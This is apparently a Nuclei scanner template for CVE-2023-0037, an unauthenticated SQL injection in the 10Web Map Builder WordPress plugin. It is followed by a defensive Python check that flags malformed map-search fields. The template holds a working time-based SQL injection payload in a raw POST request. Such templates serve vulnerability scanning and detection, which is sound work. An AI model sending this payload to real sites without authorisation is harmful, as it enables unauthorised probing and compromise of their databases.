Vulnerability Description
The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
id: CVE-2023-0037

info:
  name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  remediation: Fixed in 1.0.73
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0037
    - https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
    - https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0037
    cwe-id: CWE-89
    epss-score: 0.69395
    epss-percentile: 0.98604
    cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: map_builder_for_google_maps
    framework: wordpress
    zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based

http:
  - raw:
      - |
        @timeout: 15s
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'contains(body, "wd-google-maps")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a00473045022100b41b00e51303ded31deec9c73f56c3e2c35ac6e3f0cb955e86e3ff6127f2373802206b48f6aa300b18aae299c87e7b80674def331f103479856fd8866f146e92ddcf:922c64590222798bb761d5b6d8e72950
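
A defender-side check for the request this template sends, as an added example that is not part of the original template or of the plugin's code: it parses a form-encoded POST body and reports which of the fields used above (radius, lat, lng, distance_in) are not in the expected format, which is what a WAF rule or log review would key on. That the three numeric fields are plain decimals and that "mi" is a valid unit besides "km" are assumptions; BENIGN is a constructed sample and PROBE is the body from the template above.

```python
import re
from urllib.parse import parse_qs

# Field names come from the template's POST body; the expected formats are assumptions.
NUMERIC_FIELDS = ("radius", "lat", "lng")
NUMERIC_RE = re.compile(r"-?\d+(\.\d+)?")
ALLOWED_UNITS = {"km", "mi"}  # "km" is on the page; "mi" is an assumed second unit

BENIGN = "radius=25&lat=48.137&lng=11.575&distance_in=km"  # constructed sample
PROBE = ("radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)"
         "&lat=0.0&lng=0.0&distance_in=km")  # body copied from the template


def suspicious_fields(body: str) -> list[str]:
    """Return the map-search fields whose values are not in the expected format."""
    params = parse_qs(body, keep_blank_values=True)
    # Only judge requests that carry all three numeric fields of the map search.
    if not all(name in params for name in NUMERIC_FIELDS):
        return []
    bad = []
    for name in NUMERIC_FIELDS:
        # Check every occurrence, so a duplicated parameter cannot hide a bad value.
        if not all(NUMERIC_RE.fullmatch(v.strip()) for v in params[name]):
            bad.append(name)
    for unit in params.get("distance_in", []):
        if unit.strip().lower() not in ALLOWED_UNITS:
            bad.append("distance_in")
            break
    return bad


if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("probe", PROBE)):
        hits = suspicious_fields(body)
        print(f"{label}: {'flag ' + ','.join(hits) if hits else 'ok'}")
```

The same strict numeric check, applied server-side before the value reaches the query, is the input-validation half of the fix; parameterised queries are the other half.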